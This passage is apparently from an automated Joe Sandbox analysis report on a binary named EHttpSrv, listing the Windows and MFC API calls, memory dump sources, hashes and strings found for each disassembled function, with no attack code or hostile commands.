                                                                                                                • Instruction Fuzzy Hash: 0D31FE712082859BD734DF64CC81FDA77A8FB84714F108A2CF9996B6E1DB78AA04CB41
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424DBF
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424DD9
                                                                                                                • #310.MFC80U ref: 20424E07
                                                                                                                • #2311.MFC80U(?,2048587C,?), ref: 20424E23
                                                                                                                • #6063.MFC80U(?), ref: 20424E37
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424E4C
                                                                                                                • #6063.MFC80U(?), ref: 20424E79
                                                                                                                • #578.MFC80U ref: 20424E8D
                                                                                                                • #6063.MFC80U(20485878), ref: 20424EA0
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 20424EB0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$MessageSend$#2311#310#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 2015696880-0
                                                                                                                • Opcode ID: 12ec6e357741f612d219a2ba16293cc838421ccef7c7c8107f3ccfdece8e47a5
                                                                                                                • Instruction ID: 89d52809d9a14359d67d6ded87461b4adf0d1e0f6513ed5cbe667fd8efaedc71
                                                                                                                • Opcode Fuzzy Hash: 12ec6e357741f612d219a2ba16293cc838421ccef7c7c8107f3ccfdece8e47a5
                                                                                                                • Instruction Fuzzy Hash: D631D2712082859BE724DF54CC81FDA77A9FB84714F008A2DF9496B6E0DB78AA05CB51
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424F3F
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424F59
                                                                                                                • #310.MFC80U ref: 20424F87
                                                                                                                • #2311.MFC80U(?,2048587C,?), ref: 20424FA3
                                                                                                                • #6063.MFC80U(?), ref: 20424FB7
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424FCC
                                                                                                                • #6063.MFC80U(?), ref: 20424FF9
                                                                                                                • #578.MFC80U ref: 2042500D
                                                                                                                • #6063.MFC80U(20485878), ref: 20425020
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 20425030
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$MessageSend$#2311#310#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 2015696880-0
                                                                                                                • Opcode ID: 14f1f0fcab9bc9b5c70a4e5ae6aa5f785e57cda8b9646d192caa1a601cd87455
                                                                                                                • Instruction ID: 072dcf0d97579acd5ff3c96ee20a3bddb1ae043b046fb552480c49fb4609d388
                                                                                                                • Opcode Fuzzy Hash: 14f1f0fcab9bc9b5c70a4e5ae6aa5f785e57cda8b9646d192caa1a601cd87455
                                                                                                                • Instruction Fuzzy Hash: D531EE712082859FD730DF64CC91FDA77A8FB84714F008A2CF9895B6D0DB78AA04CB82
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?,FEEA6C22,?,?,?,?), ref: 20462A3F
                                                                                                                • #280.MFC80U(?,?,00000000,?,?), ref: 20462A55
                                                                                                                  • Part of subcall function 20462BC0: #2461.MFC80U(00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000,?,?), ref: 20462C27
                                                                                                                  • Part of subcall function 20462BC0: #578.MFC80U ref: 20462C6E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 20462AD0
                                                                                                                • #310.MFC80U(?,00000000,?,?), ref: 20462ADE
                                                                                                                • #310.MFC80U(?,00000000,?,?), ref: 20462AF0
                                                                                                                • #4026.MFC80U(000000B7,?,00000000,?,?), ref: 20462B04
                                                                                                                • #4026.MFC80U(000000B2,?,00000000,?,?), ref: 20462B13
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00000010), ref: 20462B2A
                                                                                                                • #578.MFC80U(?,00000000,?,?), ref: 20462B39
                                                                                                                • #578.MFC80U(?,00000000,?,?), ref: 20462B4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578$#310#4026CriticalSection$#2461#280EnterLeaveMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 2040390599-0
                                                                                                                • Opcode ID: d1b394b6afb7cd036319fbe9f8089974728a8d545961154ede2f0d74acfe459a
                                                                                                                • Instruction ID: 7f7c7edbce6c7c3cccd2b4e9f3a8d610b0c3661ec1a5eaa841b80973db8cca01
                                                                                                                • Opcode Fuzzy Hash: d1b394b6afb7cd036319fbe9f8089974728a8d545961154ede2f0d74acfe459a
                                                                                                                • Instruction Fuzzy Hash: 6A3185B5118B00AFC310DF64CC85B9BB7E8FF54B15F008E2DF55692290DB39A509CB62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 204660B0: #310.MFC80U(FEEA6C22,?,?,?), ref: 2046611E
                                                                                                                  • Part of subcall function 204660B0: #310.MFC80U ref: 20466133
                                                                                                                  • Part of subcall function 204660B0: #776.MFC80U(20485878), ref: 2046614A
                                                                                                                  • Part of subcall function 204660B0: #776.MFC80U(20485878), ref: 20466159
                                                                                                                  • Part of subcall function 204660B0: #4026.MFC80U(00000084), ref: 20466168
                                                                                                                  • Part of subcall function 204660B0: #4026.MFC80U(000000A2,?), ref: 20466183
                                                                                                                  • Part of subcall function 204660B0: #896.MFC80U(?), ref: 20466192
                                                                                                                  • Part of subcall function 204660B0: #899.MFC80U(204924A8), ref: 204661A1
                                                                                                                  • Part of subcall function 204660B0: #4026.MFC80U(000000EF), ref: 204661F5
                                                                                                                  • Part of subcall function 204660B0: #896.MFC80U(?), ref: 20466204
                                                                                                                  • Part of subcall function 204660B0: #899.MFC80U( ), ref: 20466213
                                                                                                                  • Part of subcall function 204660B0: #4026.MFC80U(000000A3), ref: 20466222
                                                                                                                  • Part of subcall function 204660B0: #896.MFC80U(?), ref: 20466231
                                                                                                                  • Part of subcall function 204660B0: #899.MFC80U(204924A8), ref: 20466240
                                                                                                                  • Part of subcall function 204660B0: #4026.MFC80U(000000EF), ref: 20466293
                                                                                                                  • Part of subcall function 204660B0: #896.MFC80U(?), ref: 204662A2
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20426E28
                                                                                                                • #2362.MFC80U(00000000,?,?,?,20426D14,?,?,?,?,00000001,?,?), ref: 20426E2B
                                                                                                                • #2788.MFC80U(00000000,?,?,?,20426D14,?,?,?,?,00000001,?,?), ref: 20426E3A
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20426E4A
                                                                                                                • SendMessageW.USER32(?,00000030,?,00000001), ref: 20426E7E
                                                                                                                • SendMessageW.USER32(?,0000101E,?,0000FFFF), ref: 20426E95
                                                                                                                • #2788.MFC80U(?,?,?,20426D14,?,?,?,?,00000001,?,?), ref: 20426EA0
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20426EB2
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 20426ECD
                                                                                                                • SendMessageW.USER32(?,00000030,?,00000001), ref: 20426EE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#4026$#896$#899$#2788#310#776$#2362
                                                                                                                • String ID:
                                                                                                                • API String ID: 1710774582-0
                                                                                                                • Opcode ID: 5296d30a1ecec7ac4013f8fc71894d4989160fccefc2a84b823980d7497a5206
                                                                                                                • Instruction ID: aa4b9502e60422c1e52898dc15779102af38bc0d2ac35246eb695f8f2cc4fd3e
                                                                                                                • Opcode Fuzzy Hash: 5296d30a1ecec7ac4013f8fc71894d4989160fccefc2a84b823980d7497a5206
                                                                                                                • Instruction Fuzzy Hash: D8319C75300A11BFE628CBA4CD91FE6B369BF48B44F018259BA089B3D1DB65FC0187A4
                                                                                                                APIs
                                                                                                                • #2651.MFC80U(00000411,00000000,2045921F,00000000), ref: 20459382
                                                                                                                • #2155.MFC80U(00000411,00000000,2045921F,00000000), ref: 20459389
                                                                                                                • #2651.MFC80U(000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 204593B0
                                                                                                                • #2155.MFC80U(000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 204593B7
                                                                                                                • #2651.MFC80U(000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 204593DE
                                                                                                                • #2155.MFC80U(000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 204593E5
                                                                                                                • #2651.MFC80U(00000412,00000000,000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 2045940C
                                                                                                                • #2155.MFC80U(00000412,00000000,000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 20459413
                                                                                                                • #2651.MFC80U(00000413,00000000,00000412,00000000,000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 2045943A
                                                                                                                • #2155.MFC80U(00000413,00000000,00000412,00000000,000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 20459441
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651
                                                                                                                • String ID:
                                                                                                                • API String ID: 2951104937-0
                                                                                                                • Opcode ID: f6fe9348ba186353032b6a423a2cf5a7871d0b0adf2b203f1672f05baf4be3ad
                                                                                                                • Instruction ID: 31b31d011d396547114fe7106fc17d19e087b2da80e5e9793571ca5a8f19b2ec
                                                                                                                • Opcode Fuzzy Hash: f6fe9348ba186353032b6a423a2cf5a7871d0b0adf2b203f1672f05baf4be3ad
                                                                                                                • Instruction Fuzzy Hash: FC21D830344640DFEB1647B48815BFE26E5EB66B45F80843CA9428F6E1DBBC9DCAC701
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s
                                                                                                                • String ID: ($gfff$xXH $xXH
                                                                                                                • API String ID: 4009619764-2999701029
                                                                                                                • Opcode ID: f8be013a59c073a9477da2c2178c16b20343a47a63ff652c588ab1520a4f70e6
                                                                                                                • Instruction ID: 0ee759234e8851a67771f0f2326596c5f277068ebb508eaa214141bf9a411ff3
                                                                                                                • Opcode Fuzzy Hash: f8be013a59c073a9477da2c2178c16b20343a47a63ff652c588ab1520a4f70e6
                                                                                                                • Instruction Fuzzy Hash: BBF1B5702087018FC325CF94C580B9BBBE1AF99708F54CA5EE9598B352D735E94ACB92
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s
                                                                                                                • String ID: ($(%d)$)
                                                                                                                • API String ID: 4009619764-2787113179
                                                                                                                • Opcode ID: 15abf14657b2190d1b5379c0b4c59638615587183744a76d11c00b1c5e8c27ef
                                                                                                                • Instruction ID: 8a51930926ea8aa904346e78c63c6d9904d9bb4c0cee69b43284e936653d9135
                                                                                                                • Opcode Fuzzy Hash: 15abf14657b2190d1b5379c0b4c59638615587183744a76d11c00b1c5e8c27ef
                                                                                                                • Instruction Fuzzy Hash: EF6104716046058BC720CF98D84079BF3E1FF94704F55CA5AE95587256E3B8EAC7CB82
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s
                                                                                                                • String ID: ($(%d)$)
                                                                                                                • API String ID: 4009619764-2787113179
                                                                                                                • Opcode ID: 018303559dd34487307c3fc249e546da2c14b2a5c1b60a9b5c1aa2dbc6db4a84
                                                                                                                • Instruction ID: b073d46256fe1c90a32a90c35c6f4af868edfb0916f5bbedaa473bab11a98dca
                                                                                                                • Opcode Fuzzy Hash: 018303559dd34487307c3fc249e546da2c14b2a5c1b60a9b5c1aa2dbc6db4a84
                                                                                                                • Instruction Fuzzy Hash: 8F61E4715042059BC720DF9CC88069BF3B6EF98708F45C95DE9499B252E378EAC5CBD2
                                                                                                                APIs
                                                                                                                • WSASetLastError.WS2_32(00000000), ref: 20446E11
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000401), ref: 20446E3A
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 20446E57
                                                                                                                • #2311.MFC80U(?,%s (%s),?,?), ref: 20446EE5
                                                                                                                  • Part of subcall function 20445A50: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 20445AB2
                                                                                                                  • Part of subcall function 20445A50: strcpy_s.MSVCR80 ref: 20445AD8
                                                                                                                  • Part of subcall function 20445A50: strcat_s.MSVCR80 ref: 20445AEF
                                                                                                                  • Part of subcall function 20445A50: LoadLibraryA.KERNEL32(?,?,?,?,-00000001,?,00000008), ref: 20445AFF
                                                                                                                  • Part of subcall function 20445A50: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B0D
                                                                                                                  • Part of subcall function 20445A50: FreeLibrary.KERNEL32(00000000,?,?,?,-00000001,?,00000008), ref: 20445B18
                                                                                                                  • Part of subcall function 20445A50: strcpy_s.MSVCR80 ref: 20445B30
                                                                                                                  • Part of subcall function 20445A50: strcat_s.MSVCR80 ref: 20445B41
                                                                                                                  • Part of subcall function 20445A50: LoadLibraryA.KERNEL32(?), ref: 20445B4B
                                                                                                                  • Part of subcall function 20445A50: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 20445B5F
                                                                                                                  • Part of subcall function 20445A50: FreeLibrary.KERNEL32(00000000), ref: 20445B66
                                                                                                                • #776.MFC80U(?), ref: 20446EEC
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                • #2311.MFC80U(?,%s (%s),?,?), ref: 20446F63
                                                                                                                • #776.MFC80U(?), ref: 20446F71
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$#2311#776AddressByteCharFreeLoadMultiProcWidestrcat_sstrcpy_s$DirectoryErrorLastSystemwcscpy_s
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3711615853-1363028141
                                                                                                                • Opcode ID: f84cf21e986a7fb561d57e1cfd249b6d541893479ae5edc571268b1b06acbe83
                                                                                                                • Instruction ID: fe1e3b47f3a1e4e914dfd1958567bdeffcd6869a864d07879954a62d86137406
                                                                                                                • Opcode Fuzzy Hash: f84cf21e986a7fb561d57e1cfd249b6d541893479ae5edc571268b1b06acbe83
                                                                                                                • Instruction Fuzzy Hash: 5B51E4715083009AE320DBA4CC40BABB3E5EFD4710F51CD2EF69897291EB79A945C7A3
                                                                                                                APIs
                                                                                                                • _wcsicmp.MSVCR80 ref: 2043C9F3
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmpwcscpy_s
                                                                                                                • String ID: @My profile$NAME$NODE$Q$SUBNODE$TYPE
                                                                                                                • API String ID: 3816771565-633031873
                                                                                                                • Opcode ID: 06e1e4c1ceb70e5b99e5a53d2642d5fac0df99db4c19e5f623fd2b02eb955dc6
                                                                                                                • Instruction ID: 32ed0e59955420316cd54525bfdcfdc93ea73d8703fee88b1072996f361bdcbb
                                                                                                                • Opcode Fuzzy Hash: 06e1e4c1ceb70e5b99e5a53d2642d5fac0df99db4c19e5f623fd2b02eb955dc6
                                                                                                                • Instruction Fuzzy Hash: 863126B13402055BC700EFD5CC81BABB7D8EF99659F50D82DFA09C2350DA6DDA448762
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • ${PluginID}=, xrefs: 2043CE9E
                                                                                                                • Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles, xrefs: 2043CF27
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s$wcsncpy_s$LibraryLoad
                                                                                                                • String ID: ${PluginID}=$Software\ESET\ESET Security\CurrentVersion\Plugins\${PluginID}\Profiles
                                                                                                                • API String ID: 2742677927-2279858865
                                                                                                                • Opcode ID: 69c8d6371d800003a0a99ebf7cfdaa8ccaa03bbe307884d5313aff03d248baed
                                                                                                                • Instruction ID: 31d593b75fe56d50a8bcdc5a2c71d449045a2e827647018fd79083b8966a06ef
                                                                                                                • Opcode Fuzzy Hash: 69c8d6371d800003a0a99ebf7cfdaa8ccaa03bbe307884d5313aff03d248baed
                                                                                                                • Instruction Fuzzy Hash: 8731B2721443016BD320DB94CC86FEBB3A5EF8C708F548D2CF68597191EAB8E7498796
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeviceDriveQueryType_wcsnicmpswscanf_swcschrwcsncpy_s
                                                                                                                • String ID: ;%c:$\Device\LanmanRedirector\
                                                                                                                • API String ID: 2193757491-3518561738
                                                                                                                • Opcode ID: c43a501eb04d86f05b7fe70faa5bbcd5e9eade08c9e7890deed7aba96727e21b
                                                                                                                • Instruction ID: 792f914edced5409e40d16dff4cb6fdf5b07593157fae891470c0492212408ca
                                                                                                                • Opcode Fuzzy Hash: c43a501eb04d86f05b7fe70faa5bbcd5e9eade08c9e7890deed7aba96727e21b
                                                                                                                • Instruction Fuzzy Hash: E021A272504300ABD310DF94DC46BAB77E8BF98704F80CC2CF695D6251EA79A6498BD3
                                                                                                                APIs
                                                                                                                • #1558.MFC80U(0000042E,00000010,0000000A,00DBEAEB), ref: 20422347
                                                                                                                • SendMessageW.USER32(?,00001208,00000000,?), ref: 20422362
                                                                                                                • #2364.MFC80U(00000000), ref: 20422365
                                                                                                                • SendMessageW.USER32(?,0000120B,?,?), ref: 20422381
                                                                                                                • SendMessageW.USER32(?,0000120C,?,?), ref: 204223A1
                                                                                                                • SendMessageW.USER32(?,0000120C,?,?), ref: 204223CE
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 204223D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
